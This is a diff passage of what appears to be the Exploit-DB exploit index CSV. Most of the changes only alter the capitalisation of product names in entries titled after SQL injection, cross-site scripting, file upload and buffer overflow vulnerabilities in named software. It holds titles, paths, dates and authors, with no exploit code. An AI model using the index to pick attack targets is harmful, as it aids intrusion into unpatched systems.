28983,platforms/php/webapps/28983.txt,"cPanel 10 - newuser.html Multiple Parameter Cross-Site Scripting",2006-11-13,"Aria-Security Team",php,webapps,0 @@ -26056,7 +26056,7 @@ id,file,description,date,author,platform,type,port 29018,platforms/php/webapps/29018.txt,"Plesk 7.5/8.0 - login_up.php3 Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps,0 29019,platforms/php/webapps/29019.txt,"Zikula CMS 1.3.5 - Multiple Vulnerabilities",2013-10-17,Vulnerability-Lab,php,webapps,0 29020,platforms/php/webapps/29020.txt,"Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting",2013-10-17,Zy0d0x,php,webapps,80 -29021,platforms/php/webapps/29021.txt,"WordPress Plugin Realty - Blind SQL Injection",2013-10-17,Napsterakos,php,webapps,80 +29021,platforms/php/webapps/29021.txt,"Wordpress Plugin Realty - Blind SQL Injection",2013-10-17,Napsterakos,php,webapps,80 29023,platforms/php/webapps/29023.txt,"Woltlab Burning Board Regenbogenwiese 2007 Addon - SQL Injection",2013-10-17,"Easy Laster",php,webapps,0 29024,platforms/asp/webapps/29024.txt,"Inventory Manager - Multiple Input Validation Vulnerabilities",2006-11-14,"laurent gaffie",asp,webapps,0 29025,platforms/asp/webapps/29025.txt,"Evolve Merchant - Viewcart.asp SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 @@ -26086,8 +26086,8 @@ id,file,description,date,author,platform,type,port 29050,platforms/php/webapps/29050.txt,"Odysseus Blog 1.0 - Blog.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 29051,platforms/php/webapps/29051.txt,"Sphpblog 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,the_Edit0r,php,webapps,0 29052,platforms/php/webapps/29052.txt,"Bloo 1.00 - Googlespell_Proxy.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 -29053,platforms/asp/webapps/29053.txt,"Image gallery with Access Database - dispimage.asp id Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 -29054,platforms/asp/webapps/29054.txt,"Image gallery with Access Database - default.asp Multiple Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 +29053,platforms/asp/webapps/29053.txt,"Image Gallery with Access Database - dispimage.asp id Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 +29054,platforms/asp/webapps/29054.txt,"Image Gallery with Access Database - default.asp Multiple Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 29055,platforms/php/webapps/29055.txt,"Eggblog 3.1 - admin/articles.php edit Parameter Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 29056,platforms/php/webapps/29056.txt,"Eggblog 3.1 - admin/comments.php edit Parameter Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 29057,platforms/php/webapps/29057.txt,"Eggblog 3.1 - admin/users.php add Parameter Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 @@ -26099,11 +26099,11 @@ id,file,description,date,author,platform,type,port 29063,platforms/asp/webapps/29063.txt,"Xtreme ASP Photo Gallery 2.0 - displaypic.asp sortorder Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 29064,platforms/asp/webapps/29064.txt,"Xtreme ASP Photo Gallery 2.0 - displaypic.asp catname Parameter Cross-Site Scripting",2006-11-16,"Aria-Security Team",asp,webapps,0 29065,platforms/php/webapps/29065.txt,"WHMCS 5.2.8 - SQL Injection",2013-10-19,g00n,php,webapps,0 -29150,platforms/php/webapps/29150.txt,"WordPress SAICO Theme 1.0-1.0.2 - Arbitrary File Upload",2013-10-24,"Byakuya Kouta",php,webapps,0 +29150,platforms/php/webapps/29150.txt,"Wordpress SAICO Theme 1.0-1.0.2 - Arbitrary File Upload",2013-10-24,"Byakuya Kouta",php,webapps,0 29148,platforms/windows/dos/29148.txt,"ASF Demux for VLC 2.0.x - Denial of Service (POC)",2013-10-23,"Pedro Ribeiro",windows,dos,0 29221,platforms/cgi/webapps/29221.txt,"BlueSocket BSC 2100 5.0/5.1 - Admin.pl Cross-Site Scripting",2006-12-04,"Jesus Olmos Gonzalez",cgi,webapps,0 29222,platforms/php/webapps/29222.txt,"Cerberus Helpdesk 2.x - Spellwin.php Cross-Site Scripting",2006-12-04,"En Douli",php,webapps,0 -29068,platforms/php/webapps/29068.txt,"WordPress Area53 theme - Arbitrary File Upload",2013-10-19,"Byakuya Kouta",php,webapps,80 +29068,platforms/php/webapps/29068.txt,"Wordpress Area53 theme - Arbitrary File Upload",2013-10-19,"Byakuya Kouta",php,webapps,80 29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver (kmxfw.sys) Privilege Escalation",2006-11-16,"Ruben Santamarta ",windows,local,0 29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver (kmxstart.sys) Privilege Escalation",2006-11-16,"Ruben Santamarta ",windows,local,0 29071,platforms/php/webapps/29071.txt,"CPanel 10 - DNSlook.HTML Cross-Site Scripting",2006-11-17,"Aria-Security Team",php,webapps,0 @@ -26114,7 +26114,7 @@ id,file,description,date,author,platform,type,port 29076,platforms/windows/dos/29076.html,"Adobe Reader 7.0.x - Multiple Vulnerabilities",2006-11-17,"Michal Bucko",windows,dos,0 29077,platforms/asp/webapps/29077.txt,"20/20 Applications Data Shed 1.0 - f-email.asp itemID Parameter SQL Injection",2006-11-17,"laurent gaffie",asp,webapps,0 29078,platforms/asp/webapps/29078.txt,"20/20 Applications Data Shed 1.0 - listings.asp Multiple Parameter SQL Injection",2006-11-17,"laurent gaffie",asp,webapps,0 -29079,platforms/php/webapps/29079.txt,"VBulletin 3.6.x - Admin Control Panel Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-11-17,insanity,php,webapps,0 +29079,platforms/php/webapps/29079.txt,"vBulletin 3.6.x - Admin Control Panel Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-11-17,insanity,php,webapps,0 29080,platforms/asp/webapps/29080.txt,"BestWebApp Dating Site Login Component - Multiple Field SQL Injection",2006-11-17,"laurent gaffie",asp,webapps,0 29081,platforms/asp/webapps/29081.txt,"BestWebApp Dating Site - login_form.asp msg Parameter Cross-Site Scripting",2006-11-17,"laurent gaffie",asp,webapps,0 29085,platforms/asp/webapps/29085.txt,"A-CART 2.0 - category.asp catcode Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 @@ -26126,7 +26126,7 @@ id,file,description,date,author,platform,type,port 29090,platforms/asp/webapps/29090.txt,"Active News Manager - activeNews_comments.asp articleID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 29091,platforms/php/webapps/29091.txt,"ZonPHP 2.25 - Remote Code Execution (Remote Code Execution)",2013-10-20,"Halim Cruzito",php,webapps,0 29156,platforms/asp/webapps/29156.txt,"CreaDirectory 1.2 - search.asp search Parameter Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0 -29211,platforms/php/webapps/29211.txt,"WordPress Curvo Themes - Cross-Site Request Forgery File Upload",2013-10-26,"Byakuya Kouta",php,webapps,0 +29211,platforms/php/webapps/29211.txt,"Wordpress Curvo Themes - Cross-Site Request Forgery File Upload",2013-10-26,"Byakuya Kouta",php,webapps,0 29118,platforms/asp/webapps/29118.txt,"Enthrallweb eClassifieds - ad.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29093,platforms/asp/webapps/29093.txt,"Texas Rankem - player.asp selPlayer Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 29094,platforms/asp/webapps/29094.txt,"Texas Rankem - tournaments.asp tournament_id Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 @@ -26179,11 +26179,11 @@ id,file,description,date,author,platform,type,port 29141,platforms/asp/webapps/29141.txt,"The Classified Ad System 3.0 - default.asp Multiple Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 29142,platforms/asp/webapps/29142.txt,"Klf-Realty 2.0 - search_listing.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29143,platforms/asp/webapps/29143.txt,"Klf-Realty 2.0 - detail.asp property_id Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29144,platforms/osx/dos/29144.txt,"Apple Mac OS X 10.4.8 - UDIF Disk Image Remote Denial of Service",2006-11-20,LMH,osx,dos,0 +29144,platforms/osx/dos/29144.txt,"Apple Mac OSX 10.4.8 - UDIF Disk Image Remote Denial of Service",2006-11-20,LMH,osx,dos,0 29145,platforms/php/webapps/29145.txt,"Wabbit PHP Gallery 0.9 - Dir Parameter Directory Traversal",2006-11-20,the_Edit0r,php,webapps,0 29146,platforms/windows/remote/29146.c,"Novell Client 4.91 - NWSPOOL.dll Remote Buffer Overflow",2006-11-21,"Andres Tarasco Acuna",windows,remote,0 34371,platforms/windows/local/34371.py,"BlazeDVD Pro 7.0 - (.plf) Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0 -29161,platforms/osx/dos/29161.txt,"Apple Mac OS X 10.4.8 - UDTO Disk Image Remote Denial of Service",2006-11-21,LMH,osx,dos,0 +29161,platforms/osx/dos/29161.txt,"Apple Mac OSX 10.4.8 - UDTO Disk Image Remote Denial of Service",2006-11-21,LMH,osx,dos,0 29162,platforms/php/webapps/29162.txt,"My Little Weblog 2006.11.21 - Weblog.php Cross-Site Scripting",2006-11-21,the_Edit0r,php,webapps,0 29217,platforms/php/webapps/29217.txt,"CuteNews 1.3.6 - Result Parameter Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0 29218,platforms/php/webapps/29218.txt,"PHPNews 1.3 - Link_Temp.php Multiple Cross-Site Scripting Vulnerabilities",2006-12-02,Detefix,php,webapps,0 @@ -26216,18 +26216,18 @@ id,file,description,date,author,platform,type,port 29187,platforms/php/webapps/29187.txt,"cPanel WebHost Manager 3.1 - dofeaturemanager feature Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 29188,platforms/php/webapps/29188.txt,"cPanel WebHost Manager 3.1 - park ndomain Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 29189,platforms/asp/webapps/29189.txt,"fipsShop - Multiple SQL Injections",2006-11-25,"Aria-Security Team",asp,webapps,0 -29190,platforms/osx/local/29190.txt,"Apple Mac OS X 10.4.x - Mach-O Binary Loading Integer Overflow",2006-11-26,LMH,osx,local,0 +29190,platforms/osx/local/29190.txt,"Apple Mac OSX 10.4.x - Mach-O Binary Loading Integer Overflow",2006-11-26,LMH,osx,local,0 29191,platforms/asp/webapps/29191.txt,"ClickContact - Default.asp Multiple SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29192,platforms/asp/webapps/29192.txt,"Clickblog - Displaycalendar.asp SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29193,platforms/asp/webapps/29193.txt,"Click Gallery - Multiple Input Validation Vulnerabilities",2006-11-27,"Aria-Security Team",asp,webapps,0 -29194,platforms/osx/local/29194.c,"Apple Mac OS X 10.4.x - AppleTalk AIOCRegLocalZN IOCTL Stack Buffer Overflow",2006-11-27,LMH,osx,local,0 +29194,platforms/osx/local/29194.c,"Apple Mac OSX 10.4.x - AppleTalk AIOCRegLocalZN IOCTL Stack Buffer Overflow",2006-11-27,LMH,osx,local,0 29195,platforms/asp/webapps/29195.txt,"uPhotoGallery 1.1 - slideshow.asp ci Parameter SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29196,platforms/asp/webapps/29196.txt,"uPhotoGallery 1.1 - thumbnails.asp ci Parameter SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29197,platforms/asp/webapps/29197.txt,"Evolve Shopping Cart - products.asp SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29198,platforms/php/webapps/29198.txt,"b2evolution 1.8.2/1.9 - _404_not_found.page.php Multiple Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0 29199,platforms/php/webapps/29199.txt,"b2evolution 1.8.2/1.9 - _410_stats_gone.page.php app_name Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0 29200,platforms/php/webapps/29200.txt,"b2evolution 1.8.2/1.9 - _referer_spam.page.php Multiple Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0 -29201,platforms/osx/local/29201.c,"Apple Mac OS X 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0 +29201,platforms/osx/local/29201.c,"Apple Mac OSX 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0 29202,platforms/php/webapps/29202.txt,"Seditio1.10 /Land Down 8.0 Under - Polls.php SQL Injection",2006-11-30,ajann,php,webapps,0 29203,platforms/php/webapps/29203.php,"Woltlab Burning Board 2.3.x - Register.php Cross-Site Scripting",2006-11-30,blueshisha,php,webapps,0 29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow",2006-12-01,kcope,netbsd_x86,dos,0 @@ -26331,15 +26331,15 @@ id,file,description,date,author,platform,type,port 30203,platforms/asp/webapps/30203.txt,"Comersus Cart 7.0.7 - comersus_optReviewReadExec.asp id Parameter SQL Injection",2007-06-20,Doz,asp,webapps,0 30204,platforms/asp/webapps/30204.txt,"Comersus Cart 7.0.7 - comersus_customerAuthenticateForm.asp redirectUrl Cross-Site Scripting",2007-06-20,Doz,asp,webapps,0 30186,platforms/linux/remote/30186.txt,"Firebird SQL Fbserver 2.0 - Remote Buffer Overflow",2007-06-12,"Cody Pierce",linux,remote,0 -29330,platforms/php/webapps/29330.txt,"WordPress Switchblade Themes Arbitrary 1.3 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0 +29330,platforms/php/webapps/29330.txt,"Wordpress Switchblade Themes Arbitrary 1.3 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0 29331,platforms/php/webapps/29331.txt,"ImpressPages CMS 3.6 - manage() Function Remote Code Execution Exploit",2013-11-01,LiquidWorm,php,webapps,0 -29332,platforms/php/webapps/29332.txt,"WordPress Think Responsive Themes 1.0 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0 +29332,platforms/php/webapps/29332.txt,"Wordpress Think Responsive Themes 1.0 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0 29333,platforms/asp/webapps/29333.txt,"Efkan Forum 1.0 - Grup Variable SQL Injection",2006-12-22,ShaFuq31,asp,webapps,0 29334,platforms/cfm/webapps/29334.txt,"Future Internet - index.cfm Multiple Parameter SQL Injection",2006-12-23,Linux_Drox,cfm,webapps,0 29335,platforms/cfm/webapps/29335.txt,"Future Internet - index.cfm categoryId Parameter Cross-Site Scripting",2006-12-23,Linux_Drox,cfm,webapps,0 29336,platforms/asp/webapps/29336.txt,"Chatwm 1.0 - SelGruFra.asp SQL Injection",2006-12-24,ShaFuq31,asp,webapps,0 29337,platforms/php/webapps/29337.txt,"TimberWolf 1.2.2 - ShowNews.php Cross-Site Scripting",2006-12-24,CorryL,php,webapps,0 -29338,platforms/php/webapps/29338.txt,"VBulletin 3.5.x/3.6.x - SWF Script Injection",2006-12-25,"Ashraf Morad",php,webapps,0 +29338,platforms/php/webapps/29338.txt,"vBulletin 3.5.x/3.6.x - SWF Script Injection",2006-12-25,"Ashraf Morad",php,webapps,0 29339,platforms/php/webapps/29339.txt,"PHP Live! 3.2.2 - setup/transcripts.php search_string Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0 29340,platforms/php/webapps/29340.txt,"PHP Live! 3.2.2 - 'index.php' l Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0 29341,platforms/php/webapps/29341.txt,"PHP Live! 3.2.2 - phplive/message_box.php Multiple Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0 @@ -26359,7 +26359,7 @@ id,file,description,date,author,platform,type,port 29354,platforms/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities",2013-11-01,Vulnerability-Lab,php,webapps,0 29473,platforms/linux/dos/29473.txt,"Squid Proxy 2.5/2.6 - FTP URI Remote Denial of Service",2007-01-16,"David Duncan Ross Palmer",linux,dos,0 29474,platforms/php/webapps/29474.txt,"Scriptme SmE 1.21 - File Mailer Login SQL Injection",2007-01-16,CorryL,php,webapps,0 -29356,platforms/php/webapps/29356.txt,"WordPress 1.x/2.0.x - Template.php HTML Injection",2006-12-27,"David Kierznowski",php,webapps,0 +29356,platforms/php/webapps/29356.txt,"Wordpress 1.x/2.0.x - Template.php HTML Injection",2006-12-27,"David Kierznowski",php,webapps,0 29357,platforms/asp/webapps/29357.txt,"Hosting Controller 7C - FolderManager.aspx Directory Traversal",2006-12-27,KAPDA,asp,webapps,0 29358,platforms/asp/webapps/29358.txt,"DMXReady Secure Login Manager 1.0 - login.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 29359,platforms/asp/webapps/29359.txt,"DMXReady Secure Login Manager 1.0 - content.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 @@ -26441,21 +26441,21 @@ id,file,description,date,author,platform,type,port 29437,platforms/php/webapps/29437.txt,"Easy Banner Pro 2.8 - info.php Remote File Inclusion",2007-01-07,rUnViRuS,php,webapps,0 29438,platforms/php/webapps/29438.txt,"Edit-X - Edit_Address.php Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 29439,platforms/multiple/remote/29439.txt,"iPlanet Web Server 4.1 - Search Module Cross-Site Scripting",2007-01-09,Khalsa,multiple,remote,0 -29441,platforms/osx/dos/29441.txt,"Apple Mac OS X 10.4.8 - DMG UFS FFS_MountFS Integer Overflow",2007-01-10,LMH,osx,dos,0 +29441,platforms/osx/dos/29441.txt,"Apple Mac OSX 10.4.8 - DMG UFS FFS_MountFS Integer Overflow",2007-01-10,LMH,osx,dos,0 29442,platforms/php/webapps/29442.html,"phpBB 2.0.21 - Privmsg.php HTML Injection",2007-01-11,Demential,php,webapps,0 -29443,platforms/windows/dos/29443.py,"VideoLan VLC Media Player 0.8.6a - Unspecified Denial of Service",2007-01-11,shinnai,windows,dos,0 +29443,platforms/windows/dos/29443.py,"VideoLAN VLC Media Player 0.8.6a - Unspecified Denial of Service",2007-01-11,shinnai,windows,dos,0 29444,platforms/windows/dos/29444.pl,"CA BrightStor ARCserve Backup - Message Engine/Tape Engine Remote Buffer Overflow",2007-01-11,"Tenable NS",windows,dos,0 29445,platforms/windows/dos/29445.rb,"Hanso Player 2.5.0 - 'm3u' Buffer Overflow (Denial of Service)",2013-11-05,"Necmettin COSKUN",windows,dos,0 36794,platforms/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,multiple,webapps,0 29446,platforms/linux/local/29446.c,"Grsecurity Kernel PaX - Privilege Escalation",2006-12-18,anonymous,linux,local,0 29447,platforms/windows/dos/29447.txt,"WinZip 9.0 - Command Line Remote Buffer Overflow",2007-01-12,"Umesh Wanve",windows,dos,0 -29448,platforms/osx/remote/29448.txt,"Apple Mac OS X 10.4.8 - DMG UFS Byte_Swap_Sbin() Integer Overflow",2007-01-12,LMH,osx,remote,0 +29448,platforms/osx/remote/29448.txt,"Apple Mac OSX 10.4.8 - DMG UFS Byte_Swap_Sbin() Integer Overflow",2007-01-12,LMH,osx,remote,0 29449,platforms/multiple/remote/29449.html,"Oracle ORADC - ActiveX Control Remote Code Execution",2007-01-12,"Umesh Wanve",multiple,remote,0 29450,platforms/php/webapps/29450.txt,"Ezboxx 0.7.6 Beta - Multiple Input Validation Vulnerabilities",2007-01-12,"Doron P",php,webapps,0 29451,platforms/php/webapps/29451.txt,"All In One Control Panel 1.3.x - cp_downloads.php did Parameter SQL Injection",2007-01-12,Coloss,php,webapps,0 -29452,platforms/osx/dos/29452.txt,"Apple Mac OS X 10.4.8 - DMG UFS UFS_LookUp Denial of Service",2007-01-13,LMH,osx,dos,0 +29452,platforms/osx/dos/29452.txt,"Apple Mac OSX 10.4.8 - DMG UFS UFS_LookUp Denial of Service",2007-01-13,LMH,osx,dos,0 29453,platforms/php/webapps/29453.php,"PHP-Nuke 7.x - Block-Old_Articles.php SQL Injection",2007-01-13,Paisterist,php,webapps,0 -29454,platforms/osx/dos/29454.txt,"Apple Mac OS X 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service",2007-01-13,LMH,osx,dos,0 +29454,platforms/osx/dos/29454.txt,"Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service",2007-01-13,LMH,osx,dos,0 29455,platforms/windows/dos/29455.py,"RealNetwork RealPlayer 10.5 - .MID File Handling Remote Denial of Service",2007-01-15,shinnai,windows,dos,0 29456,platforms/asp/webapps/29456.txt,"InstantASP 4.1 - Logon.aspx SessionID Parameter Cross-Site Scripting",2007-01-15,Doz,asp,webapps,0 29457,platforms/asp/webapps/29457.txt,"InstantASP 4.1 - Members1.aspx Multiple Parameter Cross-Site Scripting",2007-01-15,Doz,asp,webapps,0 @@ -26477,7 +26477,7 @@ id,file,description,date,author,platform,type,port 29470,platforms/linux/dos/29470.txt,"Oftpd 0.3.7 - Unsupported Address Family Remote Denial of Service",2007-01-15,anonymous,linux,dos,0 29471,platforms/linux/remote/29471.txt,"BlueZ 1.x/2.x - HIDD Bluetooh HID Command Injection",2007-11-16,"Collin Mulliner",linux,remote,0 29472,platforms/php/webapps/29472.txt,"DT_Guestbook 1.0 - 'index.php' Cross-Site Scripting",2007-01-16,"Jesper Jurcenoks",php,webapps,0 -29482,platforms/php/webapps/29482.php,"WordPress Theme Kernel - Remote File Upload",2013-11-07,link_satisi,php,webapps,0 +29482,platforms/php/webapps/29482.php,"Wordpress Theme Kernel - Remote File Upload",2013-11-07,link_satisi,php,webapps,0 29483,platforms/php/webapps/29483.txt,"Indexu 5.0/5.3 - send_pwd.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29484,platforms/php/webapps/29484.txt,"Indexu 5.0/5.3 - search.php keyword Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29485,platforms/php/webapps/29485.txt,"Indexu 5.0/5.3 - register.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 @@ -26497,17 +26497,17 @@ id,file,description,date,author,platform,type,port 29502,platforms/multiple/dos/29502.html,"Transmit 3.5.5 - Remote Heap Overflow",2007-01-20,LMH,multiple,dos,0 29503,platforms/windows/dos/29503.py,"KarjaSoft Sami HTTP Server 1.0.4/1.0.5/2.0.1 - Request Remote Denial of Service",2007-01-22,shinnai,windows,dos,0 29504,platforms/php/webapps/29504.txt,"Unique Ads - Banner.php SQL Injection",2007-01-22,Linux_Drox,php,webapps,0 -29505,platforms/php/webapps/29505.txt,"212cafeBoard - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,Linux_Drox,php,webapps,0 +29505,platforms/php/webapps/29505.txt,"212Cafe Board - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,Linux_Drox,php,webapps,0 29506,platforms/php/webapps/29506.txt,"Bitweaver 1.3.1 Articles and Blogs - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,CorryL,php,webapps,0 -29507,platforms/php/webapps/29507.txt,"212Cafe Guestbook 4.00 - Show.php Cross-Site Scripting",2007-01-22,Linux_Drox,php,webapps,0 +29507,platforms/php/webapps/29507.txt,"212Cafe GuestBook 4.00 - Show.php Cross-Site Scripting",2007-01-22,Linux_Drox,php,webapps,0 29508,platforms/php/webapps/29508.sh,"Vote! Pro 4.0 - Multiple PHP Code Execution Vulnerabilities",2007-01-23,r0ut3r,php,webapps,0 -29509,platforms/osx/dos/29509.txt,"Apple Mac OS X 10.4.8 - QuickDraw GetSrcBits32ARGB Remote Memory Corruption",2007-01-23,LMH,osx,dos,0 +29509,platforms/osx/dos/29509.txt,"Apple Mac OSX 10.4.8 - QuickDraw GetSrcBits32ARGB Remote Memory Corruption",2007-01-23,LMH,osx,dos,0 30029,platforms/php/webapps/30029.txt,"SonicBB 1.0 - Search.php Cross-Site Scripting",2007-05-14,"Jesper Jurcenoks",php,webapps,0 30031,platforms/ios/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,ios,webapps,0 30032,platforms/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Buffer Overflow/SEH Buffer Overflow/DEP Bypass with ROP",2013-12-04,metacom,windows,local,0 30085,platforms/linux/webapps/30085.txt,"Zimbra - Privilegie Escalation (via Local File Inclusion)",2013-12-06,rubina119,linux,webapps,0 30035,platforms/php/webapps/30035.txt,"SonicBB 1.0 - Multiple SQL Injections",2007-05-14,"Jesper Jurcenoks",php,webapps,0 -30036,platforms/php/webapps/30036.html,"WordPress 2.1.3 - Akismet Plugin Unspecified",2007-05-14,"David Kierznowski",php,webapps,0 +30036,platforms/php/webapps/30036.html,"Wordpress 2.1.3 - Akismet Plugin Unspecified",2007-05-14,"David Kierznowski",php,webapps,0 30037,platforms/windows/remote/30037.txt,"Caucho Resin 3.1 - Encoded Space Request Full Path Disclosure",2007-05-15,"Derek Abdine",windows,remote,0 30038,platforms/windows/remote/30038.txt,"Caucho Resin 3.1 - \web-inf Traversal Arbitrary File Access",2007-05-15,"Derek Abdine",windows,remote,0 30039,platforms/multiple/local/30039.txt,"Multiple Personal Firewall Products - Local Protection Mechanism Bypass",2007-05-15,"Matousec Transparent security",multiple,local,0 @@ -26517,19 +26517,19 @@ id,file,description,date,author,platform,type,port 30043,platforms/linux/remote/30043.txt,"Sun Java JDK 1.x - Multiple Vulnerabilities",2007-05-16,"Chris Evans",linux,remote,0 30045,platforms/windows/remote/30045.html,"PrecisionID Barcode - PrecisionID_Barcode.dll ActiveX 1.9 Control Arbitrary File Overwrite",2007-05-16,shinnai,windows,remote,0 30046,platforms/windows/dos/30046.py,"Computer Associates BrightStor ARCserve Backup 11.5 - mediasvr caloggerd Denial of Service Vulnerabilities",2007-05-16,"M. Shirk",windows,dos,0 -30047,platforms/php/webapps/30047.txt,"VBulletin 3.6.6 - Calendar.php HTML Injection",2007-05-16,"laurent gaffie",php,webapps,0 +30047,platforms/php/webapps/30047.txt,"vBulletin 3.6.6 - Calendar.php HTML Injection",2007-05-16,"laurent gaffie",php,webapps,0 30048,platforms/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 - ShopContent.asp Cross-Site Scripting",2007-05-17,"John Martinelli",asp,webapps,0 -30049,platforms/windows/remote/30049.html,"LEADTOOLS Multimedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow",2007-05-17,shinnai,windows,remote,0 +30049,platforms/windows/remote/30049.html,"LeadTools Multimedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow",2007-05-17,shinnai,windows,remote,0 30050,platforms/php/webapps/30050.html,"Redoable 1.2 Theme - header.php s Parameter Cross-Site Scripting",2007-05-17,"John Martinelli",php,webapps,0 30051,platforms/php/webapps/30051.txt,"PsychoStats 2.3 - Server.php Full Path Disclosure",2007-05-17,kefka,php,webapps,0 30052,platforms/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 - Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",multiple,remote,0 30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0 -30054,platforms/jsp/webapps/30054.txt,"Sonicwall Gms 7.x - Filter Bypass & Persistent",2013-12-05,Vulnerability-Lab,jsp,webapps,0 +30054,platforms/jsp/webapps/30054.txt,"SonicWALL Gms 7.x - Filter Bypass & Persistent Exploit",2013-12-05,Vulnerability-Lab,jsp,webapps,0 30055,platforms/ios/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,ios,webapps,0 30201,platforms/php/webapps/30201.txt,"Fuzzylime 1.0 - Low.php Cross-Site Scripting",2007-06-18,RMx,php,webapps,0 30156,platforms/cgi/webapps/30156.txt,"CGILua 3.0 - SQL Injection",2013-12-09,"aceeeeeeeer .",cgi,webapps,0 30200,platforms/php/webapps/30200.txt,"PHP Hosting Biller 1.0 - 'index.php' Cross-Site Scripting",2007-08-18,Serapis.net,php,webapps,0 -30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 - Lang Cookie Parameter Local File Inclusion",2007-05-08,netVigilance,php,webapps,0 +30015,platforms/php/webapps/30015.txt,"Advanced GuestBook 2.4.2 - Lang Cookie Parameter Local File Inclusion",2007-05-08,netVigilance,php,webapps,0 30016,platforms/windows/remote/30016.txt,"Adobe RoboHelp - Frameset-7.HTML Cross-Site Scripting",2007-05-08,"Michael Domberg",windows,remote,0 30017,platforms/unix/local/30017.sh,"HP Tru64 5.0.1 - DOP Command Privilege Escalation",2007-05-08,"Daniele Calore",unix,local,0 30018,platforms/linux/remote/30018.py,"Python 2.5 - PyLocale_strxfrm Function Remote Information Leak",2007-05-08,"Piotr Engelking",linux,remote,0 @@ -26553,10 +26553,10 @@ id,file,description,date,author,platform,type,port 29519,platforms/php/webapps/29519.txt,"Horde Groupware Web Mail Edition 5.1.2 - Cross-Site Request Forgery (2)",2013-11-08,"Marcela Benetrix",php,webapps,80 29520,platforms/linux/dos/29520.txt,"GTK2 GDKPixBufLoader - Remote Denial of Service",2007-01-24,"Lubomir 